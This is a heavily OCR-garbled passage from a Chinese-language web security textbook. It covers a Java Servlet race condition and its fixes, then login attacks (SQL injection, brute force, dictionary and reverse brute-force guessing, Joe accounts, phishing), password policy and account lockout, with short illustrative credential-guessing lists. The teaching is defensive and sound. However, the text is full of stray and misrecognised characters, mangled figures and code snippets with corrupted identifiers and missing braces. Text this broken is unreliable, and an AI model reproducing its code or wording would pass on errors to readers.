首先 ，yamada 的 处 理 被 启动 ， 变 量 name 被 赋值 为 "yamada"。1 秒 钟 后 ，tanaka 的 人 处理 也 
开始 进行 ， 变 量 name 的 值 被 覆盖 为 "tanaka"。 由 于 此 后 也 一 直 为 "tanaka"， 因 此 两 个 浏览 


器 中 都 显示 了 "tanaka" 这 个 名 字 。 


安全 隐患 的 产生 原因 
安全 隐患 的 产生 原因 有 如 下 两 点 。 
name 是 共享 变量 


没有 对 共享 变量 name 加 上 互 斥 锁 
如 果 没 有 意识 到 Servlet 类 的 实例 变量 是 共享 资源 ， 那 么 就 很 可 能 会 在 不 知 不 涡 








十 
= 
咱 
局 
煞 
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对 策 
苑 态 条 件 漏洞 的 对 策 有 如 下 两 项 ， 实 施 其 中 一 项 即 可 。 
尽量 不 使 用 共享 资源 
针对 共享 资源 实施 完善 的 互 斥 锁 
下 面 我 们 来 看 看 如 何 对 上 面 的 示例 实施 防范 策略 。 
令 人 避免 使 用 共享 资源 
其 实 上 面 的 示例 根本 没有 必要 使 用 共享 资源 的 变量 name， 使 用 非 共 享 的 局 部 变量 就 能 解决 
问题 。 下 面 为 修改 后 的 代码 摘要 。 














try { 
String name = req.getParameter ("name"); // 定义 为 局 部 变量 
Thread.sleep (3000); // 等 待 3 秒 ( 模拟 耗 时 的 处 理 ) 
out .print(escapeHTML (name)); // 显示 名 


























远志 


catch (InterruptedException e) { 
out.println(e); 











令 使 用 互 斥 锁 
Java 的 多 线程 处 理 中 可 以 使 用 synchronized 语句 或 synchronized 方 法 来 进行 互 斥 锁 。 
下 面 展 示 的 就 是 使 用 synchronized 语句 来 进行 互 斥 锁 的 例子 (摘要 )。 

















try { 
synchronized(this) { // 互 斥 锁 
name = req.getParameter ("name"); 
Thread.sleep(3000); // 等 待 3 秒 ( 模拟 耗 时 的 处 理 
out .print(escapeHTML (name)); // 显示 名 



































} 


} catch (InterruptedException e) { 
out .println(e); 


} 














第 2 行 中 的 synchronized (this) 的 意思 就 是 给 Servlet 的 实例 加 上 互 斥 锁 。 加 上 
了 synchronized 语句 后 , 该 Servlet 的 synchronized 代码 块 内 便 只 允许 一 个 线程 执行 。 也 
就 是 说 ， 赋 值 给 变量 name 后 就 不 会 再 被 其 他 线程 改写 了 。 

这 里 我 们 将 此 时 各 请 求 的 处 理 依然 以 时 间 轴 的 形式 进行 整理 ， 如 下 图 所 示 。 
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图 4-126 加 上 互 斥 锁 后 的 内 部 处 理 














































































































时 刻 ( 秒 ) yamada tanaka 变量 name 
?77? 
+0 -一 name="yamada"; 一 
+1 -站 
各 种 处 理 ( 约 3 秒 ) 于 synchronized yamada 
2 | 而 等 待 ( 约 2 秒 ) 
J | 显示 name( yamada ) name='"tanaka"; 
+4 
各 种 处 理 ( 约 3 秒 ) tanaka 
+5 
+6 显示 name ( tanaka ) 

















由 上 图 可 知 ， 在 进行 "yamadan 的 处 理 时 ，"tanakan 的 处 理 暂 时 停止 并 处 于 待机 状态 。 
这 会 造成 应 用 程序 的 性 能 底下 。 如 果 对 这 个 Servlet 同时 发 出 多 个 请 求 ， 那 么 就 会 出 现 需 等 待 请 
求 数 x3 秒 的 时 间 ， 因 此 也 就 很 容易 招致 妨害 Servlet 的 攻击 ( DoS 漏洞 )。 

鉴于 这 种 情况 ， 建 议 大 家 尽量 不 要 使 用 互 斥 锁 ， 也 就 是 说 不 要 使 用 共享 资源 。 如 果 非 用 不 
可 ， 就 应 当 在 设计 上 多 下 功夫 ， 使 互 斥 锁 的 耗 时 尽 可 能 短 一 些 。 详 情 请 参考 并 行 处 理 或 多 线程 编 
程 的 参考 书 。 














总 结 


本 节 讲 述 了 因 对 共享 资源 的 互 斥 锁 处 理 不 完善 而 造成 的 问题 。 常 见 的 互 斥 锁 的 形式 为 数据 库 
中 的 锁 ( 乐观 锁 和 悲观 锁 )， 除 此 之 外 ,在 共享 变量 或 文件 时 也 需要 用 到 互 斥 锁 。 

尽量 不 使 用 共享 资源 也 能 够 提高 应 用 的 性 能 ， 而 如 果 用 到 了 共享 资源 ， 就 需要 在 设计 中 下 工 
夫 以 将 互 斥 锁 的 处 理 时 间 压 缩 至 最 短 。 








参考 : Java Servlet 的 其 他 注意 点 
Servlet 的 实例 变量 也 能 够 像 下 面 这 样 在 JSP 中 定义 。 





<$! String name; %> 














由 于 使 用 这 种 方式 定义 的 变量 也 是 在 各 请 求 间 共享 的 ， 因 此 也 需要 加 上 互 斥 锁 。 但 考虑 到 通 
常情 况 下 并 没有 必要 在 JSP 中 定义 实例 变量 ， 因 此 不 推荐 使 用 这 种 方法 。 

另外 ， 由 于 实现 singleThreadModel 接口 的 Servlet 类 能 够 保证 在 单线 程 下 运作 ， 因 此 可 以 
不 对 Servler 的 实例 变量 上 锁 。 虽 然 以 前 有 时 也 会 使 用 这 种 方法 作为 对 策 ， 但 是 在 Servlet2.4 版 本 以 
后 ， 随 着 singleThreadModel 接口 被 弃 用 ( Deprecated ) "， 今 后 也 就 不 再 推荐 使 用 这 种 方法 了 。 











中 SingleThreadModel 的 文档 : http://docs.oracle.com/javaee/1.4/api/javax/servlet/SingleThreadModel.html ( 英语 ) 。 


典型 安全 功能 


本 书 中 把 应 用 程序 里 用 来 加 强 系统 安全 程度 的 功能 称 为 安 
全 功能 。 如 果 由 于 安全 功能 里 面 存在 的 设计 不 足 ， 而 导致 
系统 安全 性 不 够 强 的 话 ， 虽 然 这 不 能 算 作 狭 义 上 的 安全 隐 
患 ， 但 也 会 使 系统 存在 被 外 界 攻 击 的 风险 。 与 之 相反 ， 如 
果 在 安全 功能 上 下 足 功夫 的 话 ， 则 可 以 防止 由 于 用 户 不 小 
心 或 者 错误 操作 等 导致 的 意外 ， 从 而 提高 系统 的 安全 性 。 
作为 典型 的 安全 功能 ， 本 章 将 会 涉及 以 下 内 容 ， 详 述 系 统 
会 受到 什么 样 的 潜在 威胁 ， 以 及 针对 这 些 威胁 应 该 在 设计 
上 采取 何 种 对 策 。 

e 认证 ( Authentication ) e 账号 管理 

e 授权 ( Authorization ) e 日 志 ( Log ) 管理 
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5.1 认证 

















认证 是 指 通 过 某 些 方法 验证 系统 用 户 身份 的 行为 。Web 应 用 程序 里 使 用 的 认证 方法 除了 在 
第 3 章 里 已 经 介绍 过 的 HTTP 认证 之 外 ， 还 有 使 用 HTML Form 的 用 户 名 和 密码 的 认证 方式 ， 以 
及 利用 客户 端的 SSL 证 书 的 认证 方式 等 。 本 书 将 主要 针对 HTML Form 认证 进行 说 明 。 
这 一 节 将 从 以 下 几 个 方面 来 说 明 当 认证 功能 存在 漏洞 时 将 会 面临 的 威胁 以 及 可 以 采取 的 
对 策 : 
登录 (Login ) 功能 
针对 暴力 破解 攻击 的 对 策 
密码 的 保存 方式 
自动 登录 
登录 表单 (Form ) 
错误 消息 
退出 登录 功能 














5.1.1 登录 功能 


用 户 登 录 功 能 可 以 称 为 是 认证 处 理 中 的 核心 ， 即 通过 对 照 用 户 输 入 的 ID、 密 码 是 否 和 数据 
库 一 致 ， 若 信息 一 致 即 认 证 成 功 。 本 书 中 把 这 种 用 户 本 人 合法 性 验证 的 功能 称 为 登录 功能 。 

登录 功能 通常 是 通过 执行 类 似 下 面 的 SQL 语句 ， 从 数据 库 中 检索 满足 用 户 ID 和 密码 条 件 的 
记录 ， 如 果 找 到 了 相应 的 用 户 记 录 ， 就 可 以 认为 是 登录 成 功 了 。 












































SELECT * FROM usermaster WHERE id=? AND password=? 











针对 登录 功能 的 攻击 


如 果 攻 击 者 成 功 攻破 了 登录 功能 ， 就 可 以 伪装 成 正常 用 户 使 用 系统 了 。 本 书 中 将 把 这 种 攻击 
称 为 非法 登录 。 认 证 功能 的 攻击 有 如 下 几 种 比较 典型 的 案例 。 


通过 SQL 注入 攻击 来 跳 过 登录 功能 

如 果 登 录 页 面 存在 SQL 注入 漏洞 ， 攻 击 者 即使 不 知道 用 户 的 密码 ， 也 可 以 利用 漏洞 ， 跳 过 
登录 功能 从 而 成 功 登 录 。 关 于 SQL 注入 的 内 容 在 4.4.1 节 已 经 介绍 过 了 ， 本 章 不 会 再 进行 更 深入 
的 讨论 。 





5.1 认证 | 263 





令 通过 SQL 注入 攻击 获取 用 户 密码 

同样 ， 如 果 应 用 中 存在 SQL 注入 漏洞 ， 则 保存 在 数据 库 中 的 用 户 ID 或 者 密码 有 可 能 被 盗 
取 。 攻 击 者 一 旦 拿 到 了 这 些 用 户 的 ID 和 密码 ， 就 可 能 冒充 用 户 登 录 。 

不 过 即使 攻击 者 利用 SQL 注入 漏洞 盗 取 了 用 户 的 密码 ， 我 们 也 有 办 法 让 攻击 者 无 法 利用 这 
些 数 据 进 行 攻击 。 具 体 对 策 我 们 将 在 5.1.3 节 中 说 明 。 


令 在 登录 页 面 进行 暴力 破解 

还 有 一 种 攻击 方法 是 在 登录 页 面 不 断 地 尝试 使 用 各 种 用 户 ID 和 密码 的 组 合 来 进行 登录 ， 具 
体 方法 包括 暴力 破解 和 字典 破解 等 。 

暴力 破解 ( Brute Force Attack ) 使 用 的 方法 是 利用 所 有 的 字符 组 合作 为 密码 来 进行 尝试 。 

字典 破解 是 事先 准备 一 个 “字典 ”， 其 中 都 是 常 被 用 户 作为 密码 使 用 的 字符 组 合 ， 然 后 按 顺 
序 尝试 字典 里 保存 的 密码 组 合 ( 见 图 5-1 )。 


图 5-1 反复 尝试 各 种 用 户 ID 和 密码 组 合 进行 攻击 



























































暴力 破解 方法 字典 破解 方法 
aaa password 
aab 123456 
aac qwerty 
aad secret 




















不 管 利用 上 面 哪 种 攻击 方法 ， 都 需要 尝试 大 量 的 用 户 ID 或 者 密码 组 合 ， 所 以 我 们 可 以 在 登 
录 功 能 中 检测 这 种 攻击 并 采取 相应 的 预防 措施 ， 具 体内 容 将 会 在 5.1.2 节 中 详细 说 明 。 


令 通过 社会 化 攻击 得 到 用 户 密码 

社会 化 攻击 (也 称 为 社会 化 工程 攻击 ，Social Hacking )， 指 的 是 并 不 对 计算 机 或 者 软件 发 起 
攻击 ， 而 是 通过 对 欺骗 用 户 ， 获 取 重 要 信息 的 攻击 方法 。+ 典 型 的 方法 比如 冒充 领导 或 者 服务 器 
管理 员 给 用 户 打 电 话 ， 欺 骗 用 户 说 “由 于 某 项 业务 需要 ， 请 告知 密码 ”， 从 而 骗取 用 户 的 密码 
的 行为 。 

此 外 ， 还 有 一 种 攻击 方法 是 通过 偷 宪 用 户 在 输入 密码 时 的 页 面 或 者 键盘 敲打 来 盗 取 密 码 ， 叫 
和 Shoulder Hack， 这 也 是 社会 化 攻击 的 一 种 。 
Shoulder Hack 如 果 从 字面 意思 来 看 的 话 有 从 用 户 背 后 探头 守 视 的 意思 ， 但 是 实际 上 即使 不 
用 伸 出 头 ， 如 果 采 用 其 他 方法 能 宇 视 到 的 话 ， 也 能 得 到 用 户 的 密码 。 在 本 书 中 ， 我 们 将 把 通过 偷 
宕 得 到 用 户 密码 的 攻击 行为 统一 称 为 Shoulder Hack。 应 对 Shoulder Hack 攻击 ， 可 以 采取 遮盖 密 
码 输 入 框 等 方法 ， 详 细 的 内 容 请 参考 5.1.5 节 。 

从 Web 应 用 程序 本 身 来 说 ， 对 于 Shoulder Hack 以 外 的 其 他 社会 化 攻击 就 显得 无 能 为 力 了 。 
我 们 可 以 通过 对 员工 、 用 户 进 行 教育 强化 的 方法 来 应 对 攻击 ， 但 这 超出 了 本 书 的 范围 ， 就 不 在 这 
里 详 述 了 。 
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令 通过 钓鱼 方法 获取 密码 
钓鱼 (Phishing ) 是 指 通 过 搭建 和 真实 网 站 非常 相像 的 山寨 网 站 ,诱骗 用 户 输入 密码 等 来 获 
取 个 人 信息 的 方法 。 这 也 是 社会 化 工程 ( Social Engineering ) 的 一 种 。 在 国外 ， 频 繁 报道 了 大 规 
模 的 钓鱼 事件 ， 在 日 本 也 报道 过 用 户 在 山寨 Yahoo!JAPAN 和 银行 等 钓鱼 网 站 上 受骗 的 案例 。 
预防 钓鱼 本 首先 是 用 户 需要 提高 警惕 ， 同 时 作为 Web 网 站 也 应 采取 相应 对 策 ， 我 们 将 在 7.2 
节 里 说 明 。 























登录 功能 被 破解 后 的 影响 

如 果 攻 击 者 攻破 了 Web 应 用 程序 以 他 人 名 义 非法 登录 ， 那 么 攻击 者 就 拥有 并 且 可 使 用 用 户 
的 所 有 权限 ， 比 如 阅读 信息 、 修 改 、 删 除 以 及 购物 、 转 账 、 发 帖 等 。 

非法 登录 带 来 的 破坏 性 与 会 话 支持 是 一 样 的 ， 如 果 密 码 被 攻击 者 知道 了 ， 有 一 些 需 要 密码 再 
次 输入 确认 的 功能 都 能 被 攻击 者 恶意 使 用 (会 话 动 持 则 不 能 达到 此 目的 )。 

另外， 会 话 动 持 攻 击 一 般 都 是 被 动 攻击 ， 攻 击 时 需要 用 户 发 起 某 些 活动 ， 攻 击 者 才能 参与 进 
来 。 而 非法 登录 是 一 种 主动 攻击 ， 不 需要 用 户 的 参与 。 因 此 非法 登录 会 对 更 多 的 用 户 产生 影响 。 

综 上 所 述 ， 非 法 登录 的 影响 比 远 超 于 会 话 劫持 ， 属 于 重大 安全 隐患 ， 需 要 制定 万 全 的 对 策 。 
















































































如 何 防止 非法 登录 

在 使 用 表单 认证 (或 者 叫 密码 认证 ) 的 应 用 里 ， 为 了 防止 非法 登录 ， 需 要 做 到 以 下 两 点 。 
确保 系统 不 存在 SQL 注入 等 安全 性 Bug 
使 用 难以 猜测 的 密码 


下 面 依次 对 这 两 点 进行 说 明 。 


4 确保 系统 中 不 存在 SQL 注入 等 安全 性 Bug 
用 户 登 录 功 能 容易 存在 的 安全 隐患 有 以 下 几 种 


(A) SQL 注入 (4.4.1 节 ) 

(B ) 固定 会 话 ID (4.6.4 节 ) 

(CC ) Cookie 的 安全 属性 设置 不 完善 (4.8.2 节 ) 
(DD ) 自由 重 定向 漏洞 (4.7.1 节 ) 

(了 E) HTTP 消息 头 注 入 (4.7.2 节 ) 


(A) 的 SQL 注入 漏洞 之 所 以 容易 发 生 ， 是 因为 在 一 般 的 用 户 登录 实现 中 都 需要 利用 SQL 在 
数据 库 中 进行 用 户 名 密码 比 对 。 
(B) 和 (C) 是 用 户 登录 认证 后 ， 在 Cookie 里 保存 会 话 ID 时 存在 安全 问题 时 所 带 来 的 安 


中 当然 ， 这 向 话 的 意思 并 不 是 说 系统 就 不 存在 其 他 安全 隐患 。 
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全 隐患 Lo] 

(DD) 和 (BB) 虽然 和 用 户 认证 没有 直接 关系 ,但 是 用 户 登 录 后 ， 多 数 应 用 需要 跳 转 到 登录 前 
的 页 面 ， 结 果 导致 登录 功能 经 常 出 现 此 类 安全 隐患 。 

下 面 介绍 一 下 有 关 密 码 预测 难度 的 问题 。 








4 设置 难以 猜测 的 密码 

密码 认证 的 前 提 是 “知道 此 密码 的 人 只 有 合法 用 户 "。 基 于 这 个 前 提 ， 可 以 判断 “只 要 某 个 
人 知道 了 密码 ， 即 可 认为 他 就 是 合法 用 户 *， 但 是 如 果 其 他 人 可 以 推测 出 此 密码 ， 那 这 个 前 提 就 
不 存在 了 。 

所 以 ， 最 基本 的 是 我 们 需要 确保 用 户 的 密码 不 能 被 其 他 人 猜测 到 。 比 如 在 4.6 节 里 提 到 的 屠 
样 ， 如 果 使 用 类 似 密码 学 级 别 的 伪 随 机 数 生成 器 的 话 ， 基 本 可 以 生成 不 能 被 猿 测 到 的 密码 。 

但 是 密码 是 需要 用 户 自己 输入 的 ,程序 生成 的 随机 密码 不 容易 记 住 ， 输 入 也 很 麻烦 ， 所 以 实 
际 上 用 户 更 多 的 是 选择 即 好 记 也 方便 输入 的 字符 串 作 为 密码 。 

一 般 来 说 ， 用 户 使 用 便捷 性 (好 记 、 输 入 方便 ) 和 系统 安全 强度 (猜测 的 困难 程度 ) 如 图 5-2 
那样 成 反比 关系 。 如 果 用 户 能 在 选择 密码 时 能 深思 熟 虑 的 话 ， 应 该 可 以 选 出 密码 安全 度 高 ， 又 能 
兼顾 到 用 户 使 用 方便 性 的 密码 。 


图 5-2 密码 的 使 用 便捷 性 和 安全 强度 的 关系 
























































































































































不 
强 | 。 随机 生成 的 长 字符 曲 
有 ,自己 选择 的 难以 
全 猜测 的 字符 品 
并 
容易 记忆 
较 短 的 单词 
弱 . 
不 方便 容易 记忆 和 输入 2 








令 密码 的 字符 种 类 和 长 度 要 求 

在 设置 一 个 不 易 被 他 人 猜 到 的 密码 时 ， 最 基本 的 要 素 就 是 密码 所 使 用 的 字符 种 类 以 及 密码 的 
长 度 。 因 为 字符 种 类 和 密码 长 度 决 定 了 可 以 作为 密码 使 用 的 字符 串 的 总 数量 。 

密码 组 合 总 数 = 字符 种 类 的 总 数 ^ 密码 位 数 

这 里 “^” 是 老 乘 运算 符 。 字 符 种 类 的 数量 指 的 是 可 以 使 用 的 字符 的 总 数量 ， 比 如 只 用 数字 
就 是 10， 只 用 小 写 英 文字 母 就 是 26 个 等 。 表 5-1 显示 的 是 根据 可 使 用 的 字符 种 类 及 密码 长 度 得 
到 的 各 种 可 能 的 密码 组 合 的 总 数 。 
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表 5-1 密码 总 数 
字符 种 类 数量 4 位 6 位 8 位 

10 种 (数字 ) 1 万 100 万 1 亿 

26 种 ( 小 写 英 文字 母 ) 约 46 万 约 3 亿 约 2000 亿 
62 种 ( 大 小 写 英 文 加 数字 ) 约 1500 万 约 570 亿 约 220 兆 

94 种 ( 字母 、 数 字 加 上 各 种 符号 ) 约 7800 万 约 6900 亿 约 6100 兆 

从 上 面 的 表 中 可 以 看 出 ， 字 符 种 类 和 密码 位 数 即 使 只 是 稍微 增加 某 一 项 的 值 ， 密 码 组 合 的 总 





数 都 将 会 大 幅 增加 。 


令 密码 的 使 用 现状 

然而 现实 中 用 户 使 用 的 密码 并 没有 表 5-1 说 明 的 那样 多 ， 其 原因 就 是 用 户 更 愿意 使 用 好 记 和 
好 输入 的 密码 。 也 就 是 说 ， 用 户 更 倾向 于 使 用 如 图 5-2 中 右 下 角 所 显示 的 密码 类 型 。 

媒体 已 经 报道 了 很 多 能 佐证 这 种 倾向 的 统计 数据 ,我 们 介绍 其 中 的 一 些 报道 ”。 下面 的 报告 都 
是 基于 非法 获取 的 用 户 密码 数据 作出 的 统计 分 析 。 





























A RockYou 被 盗 的 3200 万 个 密码 分 析 : 使 用 最 多 的 密码 是 “123456” 
http://jp.techcrunch.com/archives/20100121depressing-analysis-of-rockyou-hacked-passwords/ 

A 从 被 沪 露 的 Htomail 密码 中 分 析 得 出 ， 使 用 的 最 多 的 是 “123456” 
http://journal.mycom.co.jp/news/2009/10/08/022/index.html 

信和 通过 MySpace 钓鱼 网 站 收集 到 的 密码 中 用 的 最 多 的 是 “password1” 
https://itpro.nikkebp.co.jp/article/USNEWS/20061218/257183 


通过 这 些 报告 我 们 很 容易 看 出 用 户 在 满足 密码 限制 条 件 的 前 提 下 ， 更 愿意 使 用 简单 的 密码 。 
佑 计 在 密码 限制 条 件 为 “长 度 在 10 个 字符 以 上 ， 大 写字 母 、 小 写字 母 、 数 字 和 符号 至 少 包含 一 
个 以 上 ”的 网 站 里 ， 用 户 使 用 最 多 的 密码 就 是 “Password1!” 了 吧 。 

在 这 种 密码 使 用 情况 下 ， 如 何 让 用 户 设 置 更 安全 的 密码 ， 这 正 是 网 站 运营 方 需要 彰显 智慧 的 
地 方 。 



























































令 应 用 程序 设计 中 关于 密码 的 需求 
这 一 广 我 们 将 整理 一 下 在 应 用 程序 设计 中 需要 考虑 的 和 密码 相关 的 需求 问题 。 
设置 安全 密码 的 最 终 责任 在 于 用 户 本 人 ， 对 应 用 程序 来 说 最 低 需 求 是 “不 能 妨碍 用 户 选 择 安 
全 的 密码 ”。 换 句 话说， 就 是 不 要 超出 实际 需求 ， 设 置 过 于 严格 的 字符 种 类 和 密码 位 数 的 限制 。 
应 用 程序 关于 密码 中 使 用 的 字符 种 类 和 长 度 要 满足 最 低 需求 ， 典 型 的 有 下 面 一 些 组 合 : 


字符 种 类 : 英文 字母 和 数字 组 合 (区 分 大 小 写 ) 





























Q 这 些 报道 都 是 笔者 在 2010 年 10 月 20 日 查阅 过 的 。 
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位 数 : 最 多 可 输入 8 个 字符 
但 是 有 人 可 能 觉得 上 面 的 限制 太 局 限 了 ， 实 际 上 我 们 也 没有 必要 必须 采用 这 样 严格 的 限制 ， 
所 以 可 以 考虑 下 面 的 组 合 : 


字符 种 类 : 所 有 ASCII 字符 (0x20~0x7E ) 
位 数 : 128 位 以 内 
如 果 放 宽 密码 的 字符 种 类 和 位 数 的 限制 ,那么 用 户 可 能 不 只 是 使 用 简单 的 密码 ， 还 可 能 会 使 
用 密码 短语 ( Passphrase )。 密 人 码 短语 取代 简单 的 单词 ， 使 用 若干 的 词组 (Phrase ) 组 成 比较 长 的 
短 句 作为 密码 使 用 。 
以 上 我 们 所 说 明 的 内 容 ， 是 对 密码 的 “容器 ”的 要 求 。 即 应 用 程序 准备 了 一 个 大 的 容器 ( 即 
可 使 用 的 字符 种 类 和 密码 位 数 )， 用 户 自己 负责 ， 自 由 地 选择 自己 的 密码 。 但 是 ， 现 实 中 广泛 使 
用 的 密码 很 多 都 是 比较 容易 猜测 和 攻破 的 密码 ， 因 此 越 来 越 多 的 网 站 除了 限制 密码 使 用 的 字符 和 
位 数 外 ， 还 对 具体 的 密码 内 容 进 行 检查 、 核 对 。 



































令 严格 的 密码 检查 原则 
为 了 预防 用 户 密 码 被 攻击 ，Web 应 用 应 该 积极 采取 密码 检查 功能 。 其 基本 原则 ， 有 以 下 儿 种 : 


关于 字符 种 类 的 检查 ( 比如 字母 、 数 字 、 符 号 至 少 各 一 个 ) 
关于 密码 位 数 ( 比如 至 少 8 位 以 上 ) 

禁止 使 用 和 用 户 ID 一 样 的 密码 

禁止 使 用 密码 词典 里 有 的 词汇 做 密码 


Twitter 就 使 用 了 基于 密码 字典 的 密码 可 用 性 检查 ， 比 如 图 5-3 是 Twitter 用 户 修改 密码 的 页 
面 ”， 在 新 密码 输入 框 里 面 输入 “password” 后 的 截图 。 











5-3 Twitter 修改 密码 界面 














当前 密码 。。oooo。 
忘记 密码 了 
新 密码 过 于 简单 = 
确认 密码 。…。…。 
页 面 里 显示 了 “密码 过 于 简单 ”的 错误 信息 ， 这 时 如 果 坚 持 点 击 “修改 ”按钮 的 话 ， 则 会 
出 错 。 





也 许 这 样 的 检查 有 点 过 于 严格 ， 甚 至 引起 人 们 质疑 其 违反 了 “密码 选择 是 用 户 的 责任 ”这 一 


D https://twitter.com/settings/password 
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原则 , 但 是 反 过 来 说 这 一 措施 有 效 避 免 了 用 户 使 用 过 于 简单 的 密码 。 








5.1.2 ”针对 暴力 破解 攻击 的 对 策 


针对 在 线 暴力 破解 攻击 ， 账 号 锁定 是 一 种 有 效 的 对 抗 方式 。 我 们 里边 账号 锁定 最 常见 的 例子 
就 是 银行 卡 ， 如 果 交 易 时 连续 3 次 输入 错误 密码 ， 卡 片 就 会 被 冻结 。 这 样 可 以 有 效 地 防止 银行 卡 
被 次 或 者 被 别人 捡 到 后 非法 使 用 。 账 号 密码 也 一 样 ， 如 果 输 错 密 码 超过 了 一 定 次 数 ， 该 账号 也 应 
该 被 锁定 。 








初步 认识 账号 锁定 
在 Web 应 用 程序 里 基本 的 账号 锁定 功能 可 以 这 样 来 实现 : 

















记录 每 个 用 户 1D 的 密码 连续 错误 次 数 

如 果 密 码 错误 次 数 超过 了 一 定 上 限 , 则 锁定 此 账号 ; 被 锁定 的 账号 不 能 再 次 登录 
长 号 被 锁定 后 ,通过 邮件 等 方式 通知 该 用 户 和 系统 管理 员 

户 正常 登录 后 ,清除 之 前 记录 的 密码 错误 计数 器 
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如 果 和 ATM 一 样 ， 最 多 只 允许 用 户 输入 3 次 错误 密码 ， 可 能 有 点 太 少 ， 会 导致 用 户 账 号 频 
繁 被 锁定 。 所 以 这 个 次 数 设 为 10 次 比较 合适 
另外 ， 如 何 给 被 锁定 的 账号 解除 锁定 ， 可 以 参考 下 面 的 规则 : 
账号 被 锁定 后 30 分 钟 >， 自 动 给 该 用 户 解锁 
管理 员 利 用 某 些 方法 对 用 户 进 行 验证 后 给 该 用 户 解锁 
之 所 以 选择 30 分 钟 后 给 用 户 解 锁 ， 为 的 就 是 能 让 正常 用 户 能 尽早 登录 进来 。 也 许 有 人 会 觉 
得 30 分 钟 有 点 太 过 短暂 ， 但 实际 上 30 分 钟 是 比较 合理 有 效 的 。 
尝试 10 次 输入 密码 错误 后 再 经 过 30 分 钟 等 竺 解锁， 这 样 攻击 者 为 了 验证 100 个 密码 需要 四 
个 半 小 时 以 上 的 时 间 ， 而 且 还 会 给 系统 管理 员 发 送 10 次 账号 被 锁定 的 系统 通知 。 在 这 段 时 间 里 ， 
管理 员 可 以 详细 调查 用 户 被 锁定 的 情况 ， 且 根据 需要 ， 甚 至 可 以 封 掉 攻 击 来 源 的 了。 









































暴力 破解 攻击 的 检测 和 对 策 
目前 暴力 破解 攻击 的 变种 有 以 下 几 种 攻击 方法 。 








中 在 面向 信用 卡 加 盟 商 的 安全 标准 PCI DSS 2.0 ( https://zh.pcisecuritystandards.org/minisite/en/pci-dss-supporting-docs-v20. 
php ) 7.5.13 节 规 定 了 “在 尝试 6 次 后 锁定 用 户 ， 阻 止 用 户 反复 尝试 访问 "。 像 PCIDSS 一 样 ， 如 果 系 统 需要 遵守 的 标 
准 明 确 规定 了 账号 锁定 策略 的 话 ， 我 们 需要 按照 该 策略 规定 去 实现 。 

@ 在 PCI DSS 2.0 标准 里 也 规定 为 30 分 钟 (7.5.14 )。 


5.1 认证 | 269 





人 字典 攻击 
字典 攻击 不 是 尝试 所 有 理论 上 可 能 的 密码 组 合 ， 而 是 只 选取 使 用 频率 较 高 的 密码 按 顺 序 进 


行 尝试 。 由 于 现实 中 很 多 人 在 使 用 比较 简单 日 危险 的 密码 ， 所 以 这 个 方法 比 单纯 的 暴力 破解 效率 


更 高 。 


和 暴力 破解 一 样 ， 针 对 字典 攻击 采用 账号 锁定 是 比较 有 效 的 。 

















图 5-4 字典 攻击 的 例子 


user01:passwordl1 
user0l1:system 
user01:123456 
user01:abc012 














令 Joe 账号 检索 
应 用 程序 里 不 禁止 这 种 用 户 / 


用 户 ID 和 密码 相同 的 账号 称 为 Joe 账号 ( Joe account )， 如 果 在 应 用 和 
密码 组 合 ， 那 么 系统 里 就 可 能 存在 一 定 比 例 的 Joe 账号 。Joe 账号 检索 的 例子 可 以 参考 图 5-5。 
单纯 的 账号 锁定 不 能 解决 Joe 账户 检索 攻击 ， 具 体 对 策 将 在 后 面 进 行 讲解 。 








图 5-5 Joe 账号 检索 的 例子 





usSer0l:user0l1 
USer02 :USer02 
VSer03 :USer03 
user04:user04 











令 刻 向 暴力 破解 

通常 的 暴力 破解 是 针对 固定 的 用 户 ID,， 采 用 不 同 的 密码 尝试 登录 。 与 此 相反 ， 首 向 暴力 破 
解 (Reverse Brute Force Attack ) 则 是 固定 密码 ， 轮 换 不 同 的 用 户 ID 组 合 进行 尝试 。 图 5-6 是 使 
用 固定 密码 “passwordl ”进行 逆向 暴力 破解 的 例子 。 
针对 逆向 暴力 破解 ， 账 号 锁定 对 策 也 无 能 为 力 。 关 于 其 对 策 我 们 会 在 下 面 一 节 进 行 说 明 。 














图 5-6 ”逆向 暴力 破解 的 例子 


user01:passwordl1 
user02:password1 
user03:passwordl1 
user04:password1 














令 针对 变种 暴力 破解 的 对 策 
在 Joe 账号 攻击 和 逆向 暴力 破解 攻击 面前 ， 单 纯 的 账号 锁定 功能 没有 效果 。 但 是 ， 对 这 种 攻 


击 必 须要 采取 相应 对 策 。 


比如 ， 通 过 统计 MySpace 的 密码 后 发 现 ， 月 


上 户 使 用 最 多 的 密码 是 password1， 占 统计 对 象 总 
数 的 0.22%。 这 个 数字 看 起 来 很 小 ， 但 是 如 果 用 passwordl 做 密码 进行 逆向 暴力 破解 的 话 ， 尝 试 
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1000 个 用 户 平均 就 能 成 功 登录 2 次 。 这 种 攻击 的 成 功率 是 非常 高 的 “。 
所 以 ， 必 须要 对 这 种 攻击 采取 必要 的 措施 。 但 是 就 现实 情况 来 说 ， 还 没有 什么 特别 有 效 的 对 
策 。 下 面 列 出 一 些 辅助 措施 。 





O 严格 检查 密码 

前 面 我 们 已 经 说 明 过 了 ， 在 用 户 注册 时 根据 字典 检查 用 户 输入 的 密码 ， 如 果 密 码 是 很 多 用 
户 常 用 的 密码 ， 或 者 密码 和 用 户 ID 一 样 ， 就 拒绝 用 户 注册 。 这 样 就 能 完全 杜绝 Joe 账号 问题 了 。 
另外 ， 即 使 攻击 者 使 用 逆向 暴力 破解 ， 由 于 其 采用 的 密码 都 是 平常 被 大 量 使 用 的 密码 ， 而 如 果 这 
样 的 密码 在 系统 中 被 禁用 的 话 ， 攻 击 者 的 成 功率 也 会 大 大 降低 。 














隐藏 登录 ID 
这 种 方法 是 指 系 统 中 除了 保存 对 外 公开 的 昵称 之 外 ， 还 另外 保存 非 公开 的 用 于 登录 的 用 
户 ID。 具 体例 子 包 括 将 用 户 的 电子 邮箱 地 址 作为 登录 ID。SNS 巨头 mixi 或 GREE、facebook、 
MySpace、EC 巨头 Amazon 等 , 都 使 用 电子 邮件 作为 用 户 的 登录 ID?。 男 一 方面 ，Twitter 除了 支持 使 
用 电子 邮件 登录 之 外 ， 也 支持 用 公开 的 用 户 ID 登录 。 所 以 Twitter 不 能 有 效 地 预防 逆向 暴力 破解 。 
使 用 电子 邮件 作为 登录 ID 时 ， 需 要 考虑 到 用 户 变更 邮箱 地 址 的 需求 ， 所 以 最 好 在 内 部 保存 
一 个 唯一 的 ID 来 标识 一 个 用 户 。 






































O 监视 登录 失败 率 

